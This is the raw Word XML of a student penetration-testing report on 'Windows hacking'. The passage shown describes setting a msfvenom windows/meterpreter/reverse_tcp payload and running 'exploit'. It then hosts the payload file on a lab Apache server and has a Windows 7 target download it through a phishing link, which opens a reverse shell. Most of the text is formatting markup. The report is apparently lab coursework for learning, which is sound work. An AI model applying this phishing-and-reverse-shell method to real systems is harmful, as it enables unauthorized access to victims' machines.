      <w:r w:rsidRPr="004C506B">
        <w:t xml:space="preserve">We will also set payload that we defined in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004C506B">
        <w:t>msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004C506B">
        <w:t xml:space="preserve"> command i.e., “</w:t>
      </w:r>
      <w:r w:rsidRPr="004C506B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>windows/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004C506B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004C506B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004C506B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004C506B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D1C0771" w14:textId="1AD9AC26" w:rsidR="000D37AA" w:rsidRPr="004C506B" w:rsidRDefault="00AC4344" w:rsidP="004C506B">
      <w:r w:rsidRPr="004C506B">
        <w:t xml:space="preserve">We are in the final step of penetration testing i.e., gaining access, in previous step we have prepared all the parameters that were required to run exploit successfully. Now next is to run exploit, hence use command </w:t>
      </w:r>
      <w:r w:rsidR="000D37AA" w:rsidRPr="004C506B">
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="004C506B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>exploit</w:t>
      </w:r>
      <w:r w:rsidR="000D37AA" w:rsidRPr="004C506B">
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="004C506B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59F34680" w14:textId="1E4CA5C6" w:rsidR="00AC4344" w:rsidRPr="004C506B" w:rsidRDefault="00C54B8F" w:rsidP="004C506B">
      <w:r w:rsidRPr="004C506B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7D805FB0" wp14:editId="289A4055">
            <wp:extent cx="5731510" cy="1767205"/>
            <wp:effectExtent l="0" t="0" r="2540" b="4445"/>
            <wp:docPr id="107420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196" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId24"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1767205"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00AC4344" w:rsidRPr="004C506B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BFA2BE0" w14:textId="70346084" w:rsidR="000D37AA" w:rsidRPr="004C506B" w:rsidRDefault="000D37AA" w:rsidP="004C506B">
      <w:r w:rsidRPr="004C506B">
        <w:t xml:space="preserve">After running this </w:t>
      </w:r>
      <w:r w:rsidR="00C54B8F" w:rsidRPr="004C506B">
        <w:t>command,</w:t>
      </w:r>
      <w:r w:rsidRPr="004C506B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C54B8F" w:rsidRPr="004C506B">
        <w:t xml:space="preserve">next we need to move focus on Windows 7 now, since we are experimenting and considering a scenario that victim or target has received a mail in which a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00C54B8F" w:rsidRPr="004C506B">
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00C54B8F" w:rsidRPr="004C506B">
        <w:t xml:space="preserve"> would be visible </w:t>
      </w:r>
      <w:hyperlink r:id="rId25" w:history="1">
        <w:r w:rsidR="00C54B8F" w:rsidRPr="004C506B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://192.168.1.3/downloads/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00C54B8F" w:rsidRPr="004C506B">
        <w:t xml:space="preserve"> and if the target click on the link, target machine will</w:t>
      </w:r>
      <w:r w:rsidR="00FB323C" w:rsidRPr="004C506B">
        <w:t xml:space="preserve"> request</w:t>
      </w:r>
      <w:r w:rsidR="00C54B8F" w:rsidRPr="004C506B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FB323C" w:rsidRPr="004C506B">
        <w:t xml:space="preserve">for connection with </w:t>
      </w:r>
      <w:r w:rsidR="00C54B8F" w:rsidRPr="004C506B">
        <w:t xml:space="preserve">connected attacker’s </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00C54B8F" w:rsidRPr="004C506B">
        <w:t>apache</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00C54B8F" w:rsidRPr="004C506B">
        <w:t xml:space="preserve"> server and our malware file </w:t>
      </w:r>
      <w:r w:rsidR="00FB323C" w:rsidRPr="004C506B">
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00C54B8F" w:rsidRPr="004C506B">
        <w:t xml:space="preserve">i.e. inside </w:t>
      </w:r>
      <w:r w:rsidR="00C54B8F" w:rsidRPr="004C506B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>var/www/html/downloads</w:t>
      </w:r>
      <w:r w:rsidR="00C54B8F" w:rsidRPr="004C506B">
        <w:t xml:space="preserve"> directory</w:t>
      </w:r>
      <w:r w:rsidR="00FB323C" w:rsidRPr="004C506B">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00C54B8F" w:rsidRPr="004C506B">
        <w:t xml:space="preserve"> will be downloaded inside the Windows 7 system (Target Machine)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FB99988" w14:textId="2530F916" w:rsidR="00711E99" w:rsidRPr="004C506B" w:rsidRDefault="00711E99" w:rsidP="004C506B">
      <w:r w:rsidRPr="004C506B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="62D07C2F" wp14:editId="733903F1">
            <wp:extent cx="5131064" cy="2654436"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="177419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6611" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId26"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5131064" cy="2654436"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0728C7B2" w14:textId="6D5931D4" w:rsidR="00C54B8F" w:rsidRPr="004C506B" w:rsidRDefault="00C54B8F" w:rsidP="004C506B"/>
    <w:p w14:paraId="1810B405" w14:textId="38EB9765" w:rsidR="00C54B8F" w:rsidRPr="004C506B" w:rsidRDefault="00711E99" w:rsidP="004C506B">
      <w:r w:rsidRPr="004C506B">
        <w:t>Now if the Target machine (Windows 7) run the downloaded file a reverse shell will be open with our system (attacker) and we will get root access of the Target Machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32374BEE" w14:textId="19EA8CDF" w:rsidR="00711E99" w:rsidRPr="004C506B" w:rsidRDefault="00711E99" w:rsidP="004C506B">
      <w:r w:rsidRPr="004C506B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="562B0CEB" wp14:editId="7840357B">
            <wp:extent cx="5731510" cy="1600200"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="207127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888" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId27"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1600200"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A5F2014" w14:textId="38FCA7B9" w:rsidR="00711E99" w:rsidRPr="004C506B" w:rsidRDefault="00711E99" w:rsidP="004C506B">
      <w:r w:rsidRPr="004C506B">
        <w:t xml:space="preserve">To verify root access, we ran some commands </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="633E7567" w14:textId="56B3D689" w:rsidR="00711E99" w:rsidRPr="004C506B" w:rsidRDefault="00711E99" w:rsidP="004C506B">
      <w:r w:rsidRPr="004C506B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4C3A38A2" wp14:editId="71DF31B5">
            <wp:extent cx="5704205" cy="3041650"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="94680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4900" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId28"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5704205" cy="3041650"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE902E2" w14:textId="755414A9" w:rsidR="00711E99" w:rsidRPr="004C506B" w:rsidRDefault="00711E99" w:rsidP="004C506B">
      <w:r w:rsidRPr="004C506B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="35A97CEC" wp14:editId="3F6A6667">
            <wp:extent cx="5731510" cy="3429000"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="10538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12" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId29"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3429000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="61802173" w14:textId="11D986D5" w:rsidR="000D37AA" w:rsidRPr="004C506B" w:rsidRDefault="000D37AA" w:rsidP="004C506B"/>
    <w:p w14:paraId="241DFD5C" w14:textId="1B674071" w:rsidR="00926C8F" w:rsidRPr="004C506B" w:rsidRDefault="004C506B" w:rsidP="004C506B">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="17" w:name="_Toc148233817"/>
      <w:bookmarkStart w:id="18" w:name="_Toc148744743"/>
      <w:r>
        <w:t xml:space="preserve">4.0 </w:t>
      </w:r>
      <w:r w:rsidR="00926C8F" w:rsidRPr="004C506B">
        <w:t>Conclusion</w:t>
      </w:r>
      <w:bookmarkEnd w:id="17"/>
      <w:bookmarkEnd w:id="18"/>
      <w:r w:rsidR="00926C8F" w:rsidRPr="004C506B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26E69F12" w14:textId="0615792D" w:rsidR="00926C8F" w:rsidRPr="004C506B" w:rsidRDefault="00473058" w:rsidP="004C506B">
      <w:r w:rsidRPr="004C506B">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="242424"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">Windows hacking can be performed by the help of social engineering, in our case we found that malware created by </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004C506B">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="242424"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004C506B">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="242424"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> was able to penetrate and provide root access of windows machine. </w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00926C8F" w:rsidRPr="004C506B" w:rsidSect="00935B41">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9518" w14:textId="77777777" w:rsidR="00935B41" w:rsidRDefault="00935B41" w:rsidP="00F14D51">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="66CEF11C" w14:textId="77777777" w:rsidR="00935B41" w:rsidRDefault="00935B41" w:rsidP="00F1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CF9" w14:textId="77777777" w:rsidR="00E67EAB" w:rsidRDefault="00E6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D85F" w14:textId="77777777" w:rsidR="00935B41" w:rsidRDefault="00935B41" w:rsidP="00F14D51">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="59D4DF06" w14:textId="77777777" w:rsidR="00935B41" w:rsidRDefault="00935B41" w:rsidP="00F1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12367"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F536DAE8"/>
    <w:lvl w:ilvl="0" w:tplc="BC28EAD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06B7D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="ADF89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B371DC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F1A26AEC"/>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4C9F41BB"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="27C64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8872099">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="605387732">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="331181302">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1443917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34"/>
    <w:rsid w:val="000520EC"/>
    <w:rsid w:val="00071CCC"/>
    <w:rsid w:val="000813B6"/>
    <w:rsid w:val="000D108A"/>
    <w:rsid w:val="000D1B84"/>
    <w:rsid w:val="000D37AA"/>
    <w:rsid w:val="000E7F21"/>
    <w:rsid w:val="00110504"/>
    <w:rsid w:val="00130D1C"/>
    <w:rsid w:val="00174DAC"/>
    <w:rsid w:val="001D7951"/>
    <w:rsid w:val="00263DC5"/>
    <w:rsid w:val="00297C89"/>
    <w:rsid w:val="002D4EDC"/>
    <w:rsid w:val="002F5585"/>
    <w:rsid w:val="002F5DC1"/>
    <w:rsid w:val="003039DB"/>
    <w:rsid w:val="00395027"/>
    <w:rsid w:val="003B10DF"/>
    <w:rsid w:val="003B2088"/>
    <w:rsid w:val="003D1508"/>
    <w:rsid w:val="003F0C62"/>
    <w:rsid w:val="00421A75"/>
    <w:rsid w:val="00464B98"/>
    <w:rsid w:val="00473058"/>
    <w:rsid w:val="00476234"/>
    <w:rsid w:val="00487768"/>
    <w:rsid w:val="004C506B"/>
    <w:rsid w:val="00537362"/>
    <w:rsid w:val="00555953"/>
    <w:rsid w:val="00577E25"/>
    <w:rsid w:val="005A348E"/>
    <w:rsid w:val="00646893"/>
    <w:rsid w:val="00682ACF"/>
    <w:rsid w:val="00684AB9"/>
    <w:rsid w:val="006A3FE1"/>
    <w:rsid w:val="00711E99"/>
    <w:rsid w:val="00715D36"/>
    <w:rsid w:val="00716911"/>
    <w:rsid w:val="00755DAE"/>
    <w:rsid w:val="00807084"/>
    <w:rsid w:val="008877EA"/>
    <w:rsid w:val="008E0CB7"/>
    <w:rsid w:val="008F20AD"/>
    <w:rsid w:val="00926C8F"/>
    <w:rsid w:val="00935B41"/>
    <w:rsid w:val="00942BE1"/>
    <w:rsid w:val="00987937"/>
    <w:rsid w:val="009A2A80"/>
    <w:rsid w:val="009B477C"/>
    <w:rsid w:val="009C6B62"/>
    <w:rsid w:val="00A0644B"/>
    <w:rsid w:val="00A11CEC"/>
    <w:rsid w:val="00A91C09"/>
    <w:rsid w:val="00AC4344"/>
    <w:rsid w:val="00AC5DB0"/>
    <w:rsid w:val="00AD2318"/>
    <w:rsid w:val="00AE38E3"/>
    <w:rsid w:val="00AE7C28"/>
    <w:rsid w:val="00AF22C4"/>
    <w:rsid w:val="00B47B9E"/>
    <w:rsid w:val="00B65874"/>
    <w:rsid w:val="00B75DD3"/>
    <w:rsid w:val="00BC6CF3"/>
    <w:rsid w:val="00C31873"/>
    <w:rsid w:val="00C42422"/>
    <w:rsid w:val="00C54B8F"/>
    <w:rsid w:val="00C74136"/>
    <w:rsid w:val="00CF6CD5"/>
    <w:rsid w:val="00D54EC1"/>
    <w:rsid w:val="00D806A2"/>
    <w:rsid w:val="00E0723C"/>
    <w:rsid w:val="00E67EAB"/>
    <w:rsid w:val="00EC3BA5"/>
    <w:rsid w:val="00EE5320"/>
    <w:rsid w:val="00F14D51"/>
    <w:rsid w:val="00F42B16"/>
    <w:rsid w:val="00FB32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6944"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{A73B96C9-C778-4A22-A750-ADD1C30B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51"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00F14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51"/>
  </w:style>
  <w:style w:type="table" w:styleId="TableGrid">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="0013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36"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00BC6CF3"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00BC6CF3"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="003B20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74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D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4DAC"/>
    <w:pPr>
      <w:outlineLvl w:val="9"/>
    </w:pPr>
    <w:rPr>
      <w:kern w:val="0"/>
      <w:lang w:val="en-US"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC1">
    <w:name w:val="toc 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00174DAC"/>
    <w:pPr>
      <w:spacing w:after="100"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC2">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00174DAC"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="220"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NoSpacing">
    <w:name w:val="No Spacing"/>
    <w:link w:val="NoSpacingChar"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="004877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776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9336">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1208029735">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1326978752">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1747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192.168.1.3/download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3T00:00:00</PublishDate>
  <Abstract/>
  <CompanyAddress>Prepared by: - Prateek Shar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17043-23E4-4D9D-89DC-B7B3E780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9</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ndows hacking</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Company>Prepared for: - COL Delhi UNIVERSIT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hacking</dc:title>
  <dc:subject>Penetration Testing Report</dc:subject>
  <dc:creator>Prateek Sharma</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Prateek Sharma</cp:lastModifiedBy>
  <cp:revision>13</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-10-09T13:07:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-04-24T20:03:00Z</dcterms:modified>
</cp:coreProperties>
</file>